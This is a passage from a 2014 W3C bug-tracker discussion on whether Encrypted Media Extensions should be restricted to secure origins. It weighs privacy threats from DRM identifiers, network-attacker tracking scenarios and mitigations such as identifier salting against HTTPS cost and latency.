> > What are the two things you think I am conflating?
> 
> "Rogue" CDMs and rogue intermediates.
> 
> I'm not sure I agree with the classification that there even is a "rogue
> CDM" - it's clear from the CDMs already in existence that certain privacy
> properties (or lack) are by-design of the CDM. Ergo, they're behaving
> exactly as that CDM should - but in a way that is detrimental to the user.

When I am referring to "rogue" CDMs, I am specifically referring to CDMs that could negatively impact user privacy in the ways described by Section 7 "Privacy Considerations". 

It is not clear to me at least that the CDMs that exist today are behaving in a way that is detrimental to the user. Do you have a specific example in mind?

> The issue is that any intermediate can, for unprotected traffic, inject
> script to use that CDM and report to an arbitrary party those results.
> That's just how the web works.

I agree with you here. But I believe we have locked down the information that a CDM conforming to the privacy guidelines can provide to such a degree that the available information for disclosure here is no worse than any web application using cookies. I don't believe that this type of disclosure is enough reason for this API to be held to a higher standard for conforming CDMs. 

With regard to non-conforming or "rogue" CDMs, since the UA is in the position of trust with the user, it is up to the UA to make the determination of what CDMs to include and how to enforce the necessary constraints. If you believe that "rogue" CDMs should only be loaded on secure domains, I would be ok with that, but I suspect UAs would just refuse to load any CDMs they consider to be "rogue".

(In reply to David Dorwin from comment #43)
> (In reply to Joe Steele from comment #41)
> > My point is that we are better off asking UAs to prevent rogue CDMs than
> > requiring UAs to implement security half-measures against what they might
> > do. 
> 
> Reiterating what Ryan said, the concern is not necessarily about "rogue
> CDMS", it is about limiting the damage that is possible when exposing a CDM
> that uses permanent identifiers, is not fully sandboxed, etc.

I would consider a CDM that exposed permanent, non-blinded identifiers to be "rogue". However, exposing an identifier that is no more privacy-damaging than a cookie does not seem like a concern to me, although some may disagree. Sandboxing is in the purview of the UA, not the CDM. If the UA is not sandboxing CDMs and has agreed to load a CDM with known bad behaviors, then I would expect users that are informed and concerned will avoid that UA.
Comment 47 Ryan Sleevi 2014-08-20 23:37:15 UTC
(In reply to Joe Steele from comment #46)
> When I am referring to "rogue" CDMs, I am specifically referring to CDMs
> that could negatively impact user privacy in the ways described by Section 7
> "Privacy Considerations". 

None of these are normative.
Calling them rogue CDMs is thus something that the spec doesn't really support.

> 
> It is not clear to me at least that the CDMs that exist today are behaving
> in a way that is detrimental to the user. Do you have a specific example in
> mind?

A hardware identifier is, in some circles (both UAs and users), viewed as detrimental to the user, blinded or not.


> > The issue is that any intermediate can, for unprotected traffic, inject
> > script to use that CDM and report to an arbitrary party those results.
> > That's just how the web works.
> 
> I agree with you here. But I believe we have locked down the information
> that a CDM conforming to the privacy guidelines can provide to such a degree
> that the available information for disclosure here is no worse than any web
> application using cookies. I don't believe that this type of disclosure is
> enough reason for this API to be held to a higher standard for conforming
> CDMs.

Respectfully, I disagree, and I'm sure most members of most security teams for most user agents would agree as well.

Cookies are hardly a shining example of where we got privacy right. It took years for the "secure" flag to be introduced for cookies. User Agents are already looking at ways to reduce or prohibit cookies via HTTP.

When analyzing security considerations, it's not sufficient to say something is "not worse" than some other thing - it's a question of whether we can and should do better. And the lesson from cookies, reiterated time and time again, is that yes, we should.

This is not merely academic or ideological, nor is it specifically tied to non-blinded identifiers. Reports and disclosures of nation-state monitoring and espionage have included detailed descriptions of how blinded, purely random identifiers delivered via cookies are being used to target users. Introducing yet another means for users to be attacked (as the community has agreed it is, via BCP 188) is simply unnecessary.
 
> I would consider a CDM that exposed permanent, non-blinded identifiers to be
> a "rogue". However exposing an identifier that is no more privacy damaging
> than a cookie does not seem like a concern to me, although some may
> disagree.

We have enough evidence to strongly establish that this is indeed privacy damaging.

Additionally, the mitigations of Section 7, non-normative as they are, still force users to make tradeoffs between security and privacy.

That is, while you can point and suggest that a UA may generate a blinding factor when a user "clears their cookies", we know that few users do, and we know there are significant security benefits for the users that DON'T (reducing the typing of passwords, increasing the use of password managers, etc). We also know in practice that content providers are particularly hostile to users who employ these methods to preserve their privacy - often practically limiting the number of times a user may clear such identifiers. I (personally) regret to say that both Google and Netflix are among those that impose such limits, and I think it'd be hard to call us "rogue" in that respect.

Thus, while they exist as mitigations on paper, we know in practice that they're insufficient, and users will likely end up with identifiers that last for years at a time.

As a reminder, it's an entirely orthogonal issue as to whether two SITES receive the same identifier. An attacker in a privileged position on the network (as we have strong evidence of a number of nation-states and hostile entities being just that) can exploit a single site to obtain a persistent identifier to track that user as they browse and navigate.

When thinking about how best to protect privacy and security of users, our goal should not be the minimum possible ("how it is today"), but looking at how we can maximize this, while balancing risks ("how we SHOULD do it"). Cookies have proven time and time again that we SHOULD do secure transports.
Comment 48 Henri Sivonen 2014-08-21 11:18:50 UTC
Instead of using a term like "rogue" when different people might have a different threshold of what behavior counts as "rogue", I think it would be more productive to state which attacks specifically you'd like to defend against.

Here are some attacks I can think of:

1) The user clears caches, cookies, etc., and changes the IP address after having visited a particular site that uses EME. Then the user comes back to the site. The site correlates this new visit with the previous visit using an identifier exposed by the Key System.

2) The user visits site A and site B that both use the same CDM. Sites A and B collude on the server-side to compare their notes of Key System-exposed identifiers and correlate the visit to site A and to site B as coming from the same user.

3) The user visits an EME-using site multiple times and a passive eavesdropper on the network correlates these visits as coming from the same user by observing a Key System-exposed identifier in the network traffic.

4) The user visits multiple sites that use the same CDM and a passive eavesdropper on the network correlates these visits as coming from the same user by observing a Key System-exposed identifier in the network traffic.

5) The user visits an EME-using site multiple times and/or visits multiple same-CDM-using sites and an active attacker on the network injects additional uses of the CDM into the site(s) such that the injected uses of the CDM speak the Key System protocol with a server that the attacker controls in order for the attacker to correlate these visits as coming from the same user by observing a Key System-exposed identifier as decoded from the protocol by the attacker-controlled implementation of the Key System protocol.

6) The user visits a non-EME-using site multiple times and/or visits multiple non-EME-using sites and an active attacker on the network injects uses of the CDM into the sites that otherwise wouldn't use EME such that the injected uses of the CDM speak the Key System protocol with the server that the attacker controls in order for the attacker to correlate these visits as coming from the same user by observing the Key System-exposed identifier as decoded from the protocol by the attacker-controlled implementation of the Key System protocol.

Which ones of these attacks is this bug about defending against? Are there additional attacks that this bug is about? Which ones of these attacks are CDMs deployed in IE, Chrome and Safari currently vulnerable to? What about the CDM that Opera demoed for "devices"?

Salting the identifiers with browser-provided salt that the user can instruct the browser to forget along with cookies addresses attack #1 and can incidentally happen to foil attack #3 at some point in time.

Salting the identifiers with per-origin browser-provided salt addresses attacks #2 and #4.

(Mozilla's announced plan includes salting with the characteristics described in the two above paragraphs/sentences.)
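
As a rough sketch of the salting described above (the raw deviceId, the browser-held salt, and the use of WebCrypto are all assumptions for illustration; a real CDM would do this internally):

    // Derive a per-origin, user-clearable identifier from a stable device ID.
    // Regenerating `salt` when the user clears cookies yields a fresh
    // identifier (attack #1); mixing in the origin keeps two sites from
    // correlating their identifiers (attack #2).
    async function saltedIdentifier(deviceId, origin, salt) {
      const key = await crypto.subtle.importKey(
          'raw', salt, { name: 'HMAC', hash: 'SHA-256' }, false, ['sign']);
      const data = new Uint8Array(
          [...deviceId, ...new TextEncoder().encode(origin)]);
      return crypto.subtle.sign('HMAC', key, data);
    }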

The Key System protocol encrypting messages from the CDM to the key server such that only the key server can decrypt identifiers and encrypting messages from the key server to the CDM in such a way that the encrypted messages don't reveal the identity of a unique-per-CDM-instance key with which they can be decrypted addresses attacks #3 and #4. (The latter could be achieved by not declaring any sort of key identity so that the only way to know if you have the right key is to try decryption or by having an outer layer of encryption that decrypts with the key that's common to a large number of CDM instances.)

Prompting the user to authorize the use of the CDM on a per-site basis addresses attack #6 if the user has a good grasp of what capabilities a site is supposed to need, and could address attacks #1 and #2 in cases where the CDM is only invoked for tracking purposes, there isn't actually any media on the sites that the user wants to play, and the user has a good grasp of what capabilities a site with no media that the user wants to play is supposed to need.

Restricting EME to secure origins only would address attacks #5 and #6 and, if mixed-content XHR and Web Sockets are blocked, attacks #3 and #4 as well.

As far as I can tell, the main reason against restricting EME to secure origins only would be that it would make it harder for sites that don't already use secure origins to migrate from NPAPI-based DRM to EME-based DRM. How serious is this issue?
Comment 49 Joe Steele 2014-08-21 19:09:06 UTC
(In reply to Ryan Sleevi from comment #47)
> (In reply to Joe Steele from comment #46)
> As a reminder, it's an entirely orthogonal issue as to whether two SITES
> receive the same identifier. An attacker in a privileged position on the
> network (as we have strong evidence of a number of nation-states and hostile
> entities being just that) can exploit a single site to obtain a persistent
> identifier to track that user as they browse and navigate.

I agree with you here. But trying to mitigate this attack by THESE attackers by requiring SSL is like adding a deadbolt to your front door when the back door is a screen. SSL has its uses, but against a dedicated attacker it is easy to work around. I can provide citations if you feel they are needed.

> 
> When thinking about how best to protect privacy and security of users, our
> goal should not be the minimum possible ("how it is today"), but looking at
> how we can maximize this, while balancing risks ("how we SHOULD do it").
> Cookies have proven time and time again that we SHOULD do secure transports.

I agree here as well to a point. I think we need to balance the security benefit we would get from requiring secure origin on these APIs (IMO small) against the usability cost of this approach (IMO large). There is no perfect solution here. 

If we do end up requiring this, I think all browsers are going to have to drastically step up their game on handling of mixed-content applications and probably we will need to provide new mechanisms (outside of this spec) to allow this to be handled cleanly. 

(In reply to Henri Sivonen from comment #48)
> Which ones of these attacks is this bug about defending against? Are there
> additional attacks that this bug is about? Which ones of these attacks are
> CDMs deployed in IE, Chrome and Safari currently vulnerable to? What about
> the CDM that Opera demoed for "devices"?

Great questions. And my followup question would be -- how well would the fix this bug proposes mitigate these attacks?

> Prompting the user to authorize the use of CDM on a per-site basis addresses
> attack #6 if the user has a good  grasp of what capabilities site is
> supposed to need and could address attacks #1 and #2 in cases where the CDM
> is only invoked for tracking purposes and there isn't actually any media on
> the sites that the user wants to play and the user has a good grasp of what
> capabilities a site with no media that the user wants to play is supposed to
> need.

Prompting on a per-site basis may sound good, but the user experience is so poor around this (partly for the reasons you mention) that I don't see how it can work. 

> As far as I can tell, the main reason against restricting EME to secure
> origins only would be that it would make it harder for sites that don't
> already use secure origins to migrate from NPAPI-based DRM to EME-based DRM.
> How serious is this issue?

I don't believe that is the issue at all. IMO, the issue is that for performance reasons the media streams are not delivered via secure origins. If the app must be delivered from a secure origin, delivering the streams from an insecure origin will result in mixed-content messaging. This is generally a bad user experience. 

I am all in favor of having the app delivered from a secure origin (as I stated in comment 2) if this issue can be dealt with somehow. I have not seen a proposal for that yet.

From a DRM perspective, I don't really care whether the key server is on a secure origin or not. The additional encryption layer provides no additional security over what my CDM will already provide, but it doesn't cause any problems other than a performance degradation.
Comment 50 Mark Watson 2014-08-21 19:21:25 UTC
(In reply to Henri Sivonen from comment #48)
> 
> Restricting EME to secure origins only would address attacks #5 and #6 and, if
> mixed-content XHR and Web Sockets are blocked, attacks #3 and #4 as well.
> 

Note that, except in the case that the attacker is an authorized user of the keysystem, #5 and #6 are addressed if - as discussed in the privacy section - the keymessages are encrypted to the server, which itself is authenticated by means of a server certificate.

Also, attacks equivalent to #5 and #6 are already generally possible without EME using fingerprinting, information stored on the client by the attacked site etc. Adding EME makes no difference provided the other mitigations for #1-#4 are in place.

> As far as I can tell, the main reason against restricting EME to secure
> origins only would be that it would make it harder for sites that don't
> already use secure origins to migrate from NPAPI-based DRM to EME-based DRM.
> How serious is this issue?

Commercial CDNs charge significantly more for HTTPS services than HTTP. Migrating a large amount of traffic from HTTP to HTTPS has significant capacity / re-engineering implications. There are also operational issues that negatively impact user experience. So it's a significant issue.
Comment 51 Mark Watson 2014-08-21 19:26:50 UTC
(In reply to Joe Steele from comment #49)
> (In reply to Ryan Sleevi from comment #47)
> > (In reply to Joe Steele from comment #46)
> > As far as I can tell, the main reason against restricting EME to secure
> > origins only would be that it would make it harder for sites that don't
> > already use secure origins to migrate from NPAPI-based DRM to EME-based DRM.
> > How serious is this issue?
> 
> I don't believe that is the issue at all. IMO, the issue is that for
> performance reasons the media streams are not delivered via secure origins.
> If the app must be delivered from a secure origin, delivering the streams
> from an insecure origin will result in mixed-content messaging. This is
> generally a bad user experience. 
> 

I believe mixed content is often blocked completely - or if it isn't now, it soon will be.

I expect the response to this proposal would be very different indeed if there was a solution where only the site was delivered over HTTPS but HTTP could still be used for the content, but I don't see any prospect of such a solution. As I understand it, requiring a secure origin for EME means both site and content must switch to HTTPS.
Comment 52 David Dorwin 2014-08-21 20:57:09 UTC
(In reply to Henri Sivonen from comment #48)
Thanks for writing this.

There is another attack, which you mentioned in your discussion of #6. I think we should consider it a separate attack:
7) A non-EME-using site (i.e. no reason to use protected media), ad network, etc. uses EME to obtain a "permanent" identifier.


Below is a rough analysis of potential solutions to each of the attacks.

Avoiding #1 requires the ability for the user to clear the identifier provided to the server. Many current DRM implementations do not support this.

Avoiding #2 requires providing different identifiers to each origin. Many, if not most, current DRM implementations do not support this.

Avoiding #3 and #4 require effectively anonymizing the identifier each time it is used and/or secure transport.

Avoiding #5 requires secure origin with mixed content enforcement or server verification (e.g. whitelisting) by the CDM.

Avoiding #6 may require the mitigations for #5, the mitigations for #2 to make it the same problem as #5, and/or user prompting to alert the user to the inappropriate use of the EME APIs. Note that the prompting should be considered ineffective in the presence of such an attacker when non-secure origins are supported.

Avoiding #7 requires alerting the user (i.e. via a prompt), server verification, and/or clearing such identifiers when other site data, such as cookies, is cleared.


> Which ones of these attacks is this bug about defending against?

I think it's good to discuss all of them somewhere. I believe this bug is mostly about #3-#6.

> Which ones of these attacks are
> CDMs deployed in IE, Chrome and Safari currently vulnerable to? What about
> the CDM that Opera demoed for "devices"?

While all of those major browsers could potentially adequately address these attacks, especially on the desktop, there will be many other user agents using a variety of DRM implementations that do not do so. This is especially true of platform-based DRM, which tends to rely on a permanent unique identifier.
Comment 53 David Dorwin 2014-08-21 21:04:22 UTC
(In reply to Joe Steele from comment #49)
> Prompting on a per-site basis may sound good, but the user experience is so
> poor around this (partly for the reasons you mention) that I don't see how
> it can work. 

I think the number of sites using DRM that a user interacts with is likely to be small. Also, the UX issues can be mitigated. This issue is not unique to EME or even web APIs - native mobile apps also have per-app prompts to give users control.


(In reply to Mark Watson from comment #50)
> Note that, except in the case that the attacker is an authorized user of the
> keysystem, #5 and #6 are addressed if - as discussed in the privacy section
> - the keymessages are encrypted to the server, which itself is authenticated
> by means of a server certificate.

There is no such normative requirement in the spec, especially one that the user agent can verify or enforce. Even with encryption, the identifier must be effectively anonymized, which requires careful thought in the implementation. A secure origin is something that the user agent can enforce and verify instead of relying on the CDM vendor to do the right thing and do it correctly.

> Also, attacks equivalent to #5 and #6 are already generally possible without
> EME using fingerprinting, information stored on the client by the attacked
> site etc. Adding EME makes no difference provided the other mitigations for
> #1-#4 are in place.

I think it's misleading to compare the identifiers DRM systems often use to fingerprinting or local storage. In the worst case, DRM systems expose a permanent non-clearable cryptographic identifier tied to the hardware. Even reinstalling the OS (if possible) may not clear the identifier. This is much stronger than fingerprinting or local storage.

There are mitigations, but those are not normative either.

> Commercial CDNs charge significantly more for HTTPS services than HTTP.
> Migrating a large amount of traffic from HTTP to HTTPS has significant
> capacity / re-engineering implications. There are also operational issues
> that negatively impact user experience. So it's a significant issue.

The cost and other issues are something that will need to change as more of the web moves to HTTPS. EME is likely to be around long after that happens. There may be a slight overhead (see https://istlsfastyet.com/), but charging "significantly more" seems unreasonable. Maybe there is a market opportunity for some CDNs.
Comment 54 Ryan Sleevi 2014-08-21 21:19:18 UTC
(In reply to Mark Watson from comment #50)
> Commercial CDNs charge significantly more for HTTPS services than HTTP.
> Migrating a large amount of traffic from HTTP to HTTPS has significant
> capacity / re-engineering implications. There are also operational issues
> that negatively impact user experience. So it's a significant issue.

Let's not broadly generalize here.

We're actually seeing more and more commercial CDNs offer high-performance, secure, optimized TLS *for free* to their customers.

Both Amazon CloudFront and CloudFlare are two such examples.
Now, there is one particularly large CDN that continues to charge exceptionally high rates, under the claim that this is necessary because clients do not support TLS Server Name Indication.

I think we can assume that all such EME clients do support SNI, and we can always normatively require such (along with TLS 1.2) within the EME spec if there is any question or doubt about this.

As for the claims of SSL adding additional overhead or latency, I would encourage members to read http://tools.ietf.org/html/draft-mattsson-uta-tls-overhead-00 (for which an update is already being prepared), that looks at the practical real-world overhead and shows that it's virtually non-existent.

This is unquestionably a diversion from the main crux of this bug - which is whether a secure transport MUST (normatively) be required, due to the complex and potential (indeed probable) privacy impact of EME - but if the argument is that TLS is not viable, well, the evidence at present is that this is not the case, and it will continue to be even less of a viable argument over time.
Comment 55 Mark Watson 2014-08-21 21:23:27 UTC
(In reply to David Dorwin from comment #53)
> (In reply to Joe Steele from comment #49)
> > Prompting on a per-site basis may sound good, but the user experience is so
> > poor around this (partly for the reasons you mention) that I don't see how
> > it can work. 
> 
> I think the number of sites using DRM that a user interacts with is likely
> to be small. Also, the UX issues can be mitigated. This issue is not unique
> to EME or even web APIs - native mobile apps also have per-app prompts to
> give users control.
> 
> 
> (In reply to Mark Watson from comment #50)
> > Note that, except in the case that the attacker is an authorized user of the
> > keysystem, #5 and #6 are addressed if - as discussed in the privacy section
> > - the keymessages are encrypted to the server, which itself is authenticated
> > by means of a server certificate.
> 
> There is no such normative requirement in the spec, especially one that the
> user agent can verify or enforce. Even with encryption, the identifier must
> be effectively anonymized, which requires careful thought in the
> implementation. A secure origin is something that the user agent can enforce
> and verify instead of relying on the CDM vendor to do the right thing and do
> it correctly.

That's fine if the UA implementor and CDM vendor are distinct or not communicating with each other. But in the case that they are the same entity, or where the UA implementor feels they have been told enough about the CDM's operation, it's unnecessary to use a secure transport.

> 
> > Also, attacks equivalent to #5 and #6 are already generally possible without
> > EME using fingerprinting, information stored on the client by the attacked
> > site etc. Adding EME makes no difference provided the other mitigations for
> > #1-#4 are in place.
> 
> I think it's misleading to compare the identifiers DRM systems often use to
> fingerprinting or local storage. In the worst case, DRM systems expose a
> permanent non-clearable cryptographic identifier tied to the hardware.

I qualified my statement with a restriction to those DRMs that *don't* do that: Those that enable users to clear the identifier as per the privacy mitigations.

Those mitigations need to be in place because secure origins don't help with those attacks.

> Even
> reinstalling the OS (if possible) may not clear the identifier. This is much
> stronger than fingerprinting or local storage.
> 
> There are mitigations, but those are not normative either.

Well, since the whole thread is about introducing a normative requirement, we can explore making other things normative instead. Like I've said, I don't necessarily have a problem with saying "If conditions X, Y, Z do not hold, then secure transport MUST be used." It's the blanket requirement I object to, because it's unnecessary in many cases.

> 
> > Commercial CDNs charge significantly more for HTTPS services than HTTP.
> > Migrating a large amount of traffic from HTTP to HTTPS has significant
> > capacity / re-engineering implications. There are also operational issues
> > that negatively impact user experience. So it's a significant issue.
> 
> The cost and other issues are something that will need to change as more of
> the web moves to HTTPS. EME is likely to be around long after that happens.
> There may be a slight overhead (see https://istlsfastyet.com/), but charging
> "significantly more" seems unreasonable. Maybe there is a market opportunity
> for some CDNs.

Sure. If all video traffic on the net migrates to HTTPS then there is probably also a market opportunity for optimized NICs*, solutions to operational problems, further optimizations to TLS speed, opportunities to short transparent proxy providers and to poach customers from ISPs who use them (whose networks are now toast). But you are talking about a five-year project here whilst proposing to enforce the requirement right now.

[* https://istlsfastyet.com/ says 'Good news is, modern hardware has made great improvements to help minimize these costs, and what once may have required additional hardware can now be done efficiently by the CPU.', but what if your data is not flowing through a CPU at the server ?]
Comment 56 Joe Steele 2014-08-21 22:01:30 UTC
(In reply to David Dorwin from comment #53)
> (In reply to Joe Steele from comment #49)
> > Prompting on a per-site basis may sound good, but the user experience is so
> > poor around this (partly for the reasons you mention) that I don't see how
> > it can work. 
> 
> I think the number of sites using DRM that a user interacts with is likely
> to be small. Also, the UX issues can be mitigated. This issue is not unique
> to EME or even web APIs - native mobile apps also have per-app prompts to
> give users control.

You are correct that this is not unique to EME. However, in user testing we have seen significant falloff in completion rates for any web application that requires a user opt-in to run. I think a normative requirement for this type of opt-in prior to using the API will result in very low usage of this API. I could be wrong though -- there could be some amazing UX out there for this that I have not seen. But it is not in Chrome, Firefox, Internet Explorer or Opera.


(In reply to Ryan Sleevi from comment #54)
> (In reply to Mark Watson from comment #50)
> As for the claims of SSL adding additional overhead or latency, I would
> encourage members to read
> http://tools.ietf.org/html/draft-mattsson-uta-tls-overhead-00 (for which an
> update is already being prepared), that looks at the practical real-world
> overhead and shows that it's virtually non-existent.

The overhead is not zero. And when you have large numbers of transactions compressed into a small window, the overhead can have a significant impact. Not to mention that SSL introduces additional failure modes, as Mark mentioned earlier.

> This is unquestionably a diversion from the main crux of this bug - which is
> whether a secure transport MUST (normatively) be required, due to the
> complex and potentially (and probable) privacy impact of EME - but if the
> argument is that TLS is not viable, well, the evidence at present is that
> this is not the case, and will continue to be even less of a viable argument
> over time.

I don't think we are arguing that TLS is not viable (at least I am not). I am arguing that HTTP with message-based encryption is equally viable and has certain advantages. We should allow implementations to leverage those advantages when they want to.

There is a good writeup on a weakness specific to SSL/TLS here -- http://www.thoughtcrime.org/blog/ssl-and-the-future-of-authenticity. 
Perhaps ironically, the tightly controlled message-based encryption used by many DRMs is not subject to these issues and thus is more secure than SSL in this sense at least.
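
For clarity, the "message-based encryption" being contrasted with SSL/TLS here is, conceptually, the CDM encrypting its key messages directly to the license server's key, independent of transport. A loose sketch of the idea follows; WebCrypto and RSA-OAEP stand in for a CDM's internal crypto and are not a statement about any real DRM:

    // Only the holder of the license server's private key can read the
    // key message, whether it travels over HTTP or HTTPS.
    async function encryptKeyMessage(serverPublicKey, keyMessage) {
      return crypto.subtle.encrypt({ name: 'RSA-OAEP' },
                                   serverPublicKey, keyMessage);
    }

As comment 53 notes, though, the user agent cannot verify or enforce any of this; that asymmetry is the crux of the secure-origin argument.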
Comment 57 David Dorwin 2014-08-21 22:05:11 UTC
(In reply to Mark Watson from comment #55)
> (In reply to David Dorwin from comment #53)
> > (In reply to Mark Watson from comment #50)
> > > Note that, except in the case that the attacker is an authorized user of the
> > > keysystem, #5 and #6 are addressed if - as discussed in the privacy section
> > > - the keymessages are encrypted to the server, which itself is authenticated
> > > by means of a server certificate.
> > 
> > There is no such normative requirement in the spec, especially one that the
> > user agent can verify or enforce. Even with encryption, the identifier must
> > be effectively anonymized, which requires careful thought in the
> > implementation. A secure origin is something that the user agent can enforce
> > and verify instead of relying on the CDM vendor to do the right thing and do
> > it correctly.
> 
> That's fine if the UA implementor and CDM vendor are distinct or not
> communicating with each other. But in the case that they are the same
> entity, or where the UA implementor feels they have been told enough about
> the CDM's operation, it's unnecessary to use a secure transport.

Maybe, but are Netflix and other content providers going to offer HTTPS support for those UAs that feel secure transport is necessary? If not, the point above is moot because that would segment the web platform in an unacceptable way.

> > > Also, attacks equivalent to #5 and #6 are already generally possible without
> > > EME using fingerprinting, information stored on the client by the attacked
> > > site etc. Adding EME makes no difference provided the other mitigations for
> > > #1-#4 are in place.
> > 
> > I think it's misleading to compare the identifiers DRM systems often use to
> > fingerprinting or local storage. In the worst case, DRM systems expose a
> > permanent non-clearable cryptographic identifier tied to the hardware.
> 
> I qualified my statement with a restriction to those DRMs that *don't* do
> that: Those that enable users to clear the identifier as per the privacy
> mitigations.
> 
> Those mitigations need to be in place because secure origins don't help with
> those attacks.

Both #5 and #6 include "an active attacker on the network". Secure origins absolutely help with those attacks.

> > > Commercial CDNs charge significantly more for HTTPS services than HTTP.
> > > Migrating a large amount of traffic from HTTP to HTTPS has significant
> > > capacity / re-engineering implications. There are also operational issues
> > > that negatively impact user experience. So it's a significant issue.
> > 
> > The cost and other issues are something that will need to change as more of
> > the web moves to HTTPS. EME is likely to be around long after that happens.
> > There may be a slight overhead (see https://istlsfastyet.com/), but charging
> > "significantly more" seems unreasonable. Maybe there is a market opportunity
> > for some CDNs.
> 
> Sure. If all video traffic on the net migrates to HTTPS then there is
> probably also a market opportunity for optimized NICs*, solutions to
> operational problems, further optimizations to TLS speed, opportunities to
> short transparent proxy providers and to poach customers from ISPs who use
> them (whose networks are now toast). But you are talking about a five-year
> project here whilst proposing to enforce the requirement right now.

As the geolocation API has shown, we only get one chance to get it right.
> 
> [* https://istlsfastyet.com/ says 'Good news is, modern hardware has made
> great improvements to help minimize these costs, and what once may have
> required additional hardware can now be done efficiently by the CPU.', but
> what if your data is not flowing through a CPU at the server ?]

See Ryan's comment #54.
Comment 58 David Dorwin 2014-08-21 22:17:29 UTC
(In reply to Joe Steele from comment #56)
> (In reply to David Dorwin from comment #53)
> > (In reply to Joe Steele from comment #49)
> > > Prompting on a per-site basis may sound good, but the user experience is so
> > > poor around this (partly for the reasons you mention) that I don't see how
> > > it can work. 
> > 
> > I think the number of sites using DRM that a user interacts with is likely
> > to be small. Also, the UX issues can be mitigated. This issue is not unique
> > to EME or even web APIs - native mobile apps also have per-app prompts to
> > give users control.
> 
> You are correct that this is not unique to EME. However in user testing we
> have seen significant falloff in completion rates in using any web
> application that requires a user opt-in to run. I think a normative
> requirement for this type of opt-in prior to using the API will result in
> very low usage of this API. I could be wrong though -- there could be some
> amazing UX out there for this I have not seen. But it is not in Chrome,
> Firefox, Internet Explorer or Opera. 

(I'm interpreting "opt-in" as "prompt", but that may not be what you meant.)
Maybe users don't like what is being requested. In that case, the prompts are working as intended. (Admittedly, prompts are often ineffective for many users. That is a general problem that people are actively looking to address.)

I disagree that such a one-time prompt is going to prevent usage of EME by sites that wish to use DRM on the web platform.

Other APIs that normatively mention permissions appear to cover the permission request in the algorithm but make it optional in some way. This could also be motivation to implement/use a more user-friendly solution that does not need additional permission.

This is off topic, though. Maybe we should open a separate bug to continue discussion.
Comment 59 Mark Watson 2014-08-21 22:18:54 UTC
(In reply to David Dorwin from comment #57)
> (In reply to Mark Watson from comment #55)
> > (In reply to David Dorwin from comment #53)
> > > (In reply to Mark Watson from comment #50)
> > > > Also, attacks equivalent to #5 and #6 are already generally possible without
> > > > EME using fingerprinting, information stored on the client by the attacked
> > > > site etc. Adding EME makes no difference provided the other mitigations for
> > > > #1-#4 are in place.
> > > 
> > > I think its misleading to compare the identifiers DRM systems often use to
> > > fingerpriting or local storage. In the worst case, DRM systems exposes a
> > > permanent non-clearable cryptographic identifier tied to the hardware.
> > 
> > I qualified my statement with a restriction to those DRMs that *don't* do
> > that: Those that enable users to clear the identifier as per the privacy
> > mitigations.
> > 
> > Those mitigations need to be in place because secure origins don't help with
> > those attacks.
> 
> Both #5 and #6 include "an active attacker on the network". Secure origins
> absolutely help with those attacks.

I know. Let me take a step back. Attacks #1 and #2 are not mitigated by secure origin. Other mitigations as outlined in the privacy section need to be in place.

What I said was - assuming those mitigations are in place - then what's left of attacks #5 and #6 is no worse with EME than it is without EME. Specifically, I did not compare non-clearable identifiers to fingerprinting / local storage, I compared clearable, origin-specific, identifiers to those things.

> 
> > > > Commercial CDNs charge significantly more for HTTPS services than HTTP.
> > > > Migrating a large amount of traffic from HTTP to HTTPS has significant
> > > > capacity / re-engineering implications. There are also operational issues
> > > > that negatively impact user experience. So it's a significant issue.
> > > 
> > > The cost and other issues are something that will need to change as more of
> > > the web moves to HTTPS. EME is likely to be around long after that happens.
> > > There may be a slight overhead (see https://istlsfastyet.com/), but charging
> > > "significantly more" seems unreasonable. Maybe there is a market opportunity
> > > for some CDNs.
> > 
> > Sure. If all video traffic on the net migrates to HTTPS then there is
> > probably also a market opportunity for optimized NICs*, solutions to
> > operational problems, further optimizations to TLS speed, opportunities to
> > short transparent proxy providers and to poach customers from ISPs who use
> > them (whose networks are now toast). But you are talking about a five-year
> > project here whilst proposing to enforce the requirement right now.
> 
> As the geolocation API has shown, we only get one chance to get it right.
> > 
> > [* https://istlsfastyet.com/ says 'Good news is, modern hardware has made
> > great improvements to help minimize these costs, and what once may have
> > required additional hardware can now be done efficiently by the CPU.', but
> > what if your data is not flowing through a CPU at the server ?]
> 
> See Ryan's comment #54.

That doesn't really answer my point.

It's being argued here that migration to HTTPS is trivial, low cost, and therefore a reasonable thing to expect people to do when migrating from plug-ins to EME, even though the technical rationale is weak / restricted to CDMs that do not follow the privacy / security mitigations in the document (but nevertheless somehow get themselves integrated into a UA).

I'm disputing both that it is low-cost, particularly at scale, and that the mitigations in the document are insufficient.
Comment 60 Joe Steele 2014-08-21 22:20:13 UTC
(In reply to Joe Steele from comment #56)
> (In reply to Ryan Sleevi from comment #54)
> > (In reply to Mark Watson from comment #50)
> > As for the claims of SSL adding additional overhead or latency, I would
> > encourage members to read
> > http://tools.ietf.org/html/draft-mattsson-uta-tls-overhead-00 (for which an
> > update is already being prepared), that looks at the practical real-world
> > overhead and shows that it's virtually non-existent.
> 
> The overhead is not zero. And when you are having large numbers of
> transactions compressed into a small window the overhead can have a
> significant impact. Not to mention that SSL introduces additional failure
> modes as Mark mentioned earlier. 

I just read through this draft. It seems very thorough and I can't dispute the claims made. However -- I still don't think this is a good argument for requiring TLS on these APIs.

This quote in particular -- from the end of the draft:

   For everything but very short connections, TLS is not inducing any
   major traffic overhead (nor CPU or memory overhead).  Server people
   from Google Gmail has stated that "TLS accounts for less than 1% of
   the CPU load, less than 10 KB of memory per connection and less than
   2% of network overhead".  Main impact of TLS is increased latency,
   this can by reduced by using session resumption, cache information
   closer to end users, or waiting for TLS 1.3.

The key requests made by some DRMs fall exactly into this category of "very short connections": one packet out, one packet in. The overhead of negotiating an SSL channel (which may ultimately add nothing to the security) can be almost 100%, even if we wait for TLS 1.3 as suggested. 

The increased latency mentioned could definitely cause a problem for media streams that are highly time-sensitive, e.g. live sporting events. However, the mitigations suggested do not seem like they would be effective for one-off connections to CDNs. This seems like it will require fairly major infrastructure improvements before we reach the point where we can discard HTTP completely. 
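
To make the arithmetic concrete, here is a back-of-envelope sketch in Python. The round-trip counts are illustrative assumptions, not measurements: one RTT for the TCP handshake, two more for a full TLS 1.2 handshake, and one for the request/response itself.

    # Illustrative round-trip accounting for a one-shot key request; all
    # figures are assumptions, not measurements.
    RTT_MS = 50             # hypothetical client-to-server round-trip time

    http_rtts = 1 + 1       # TCP handshake + request/response
    https_rtts = 1 + 2 + 1  # TCP + full TLS 1.2 handshake + request/response

    print(f"HTTP:  {http_rtts * RTT_MS} ms")    # 100 ms
    print(f"HTTPS: {https_rtts * RTT_MS} ms")   # 200 ms
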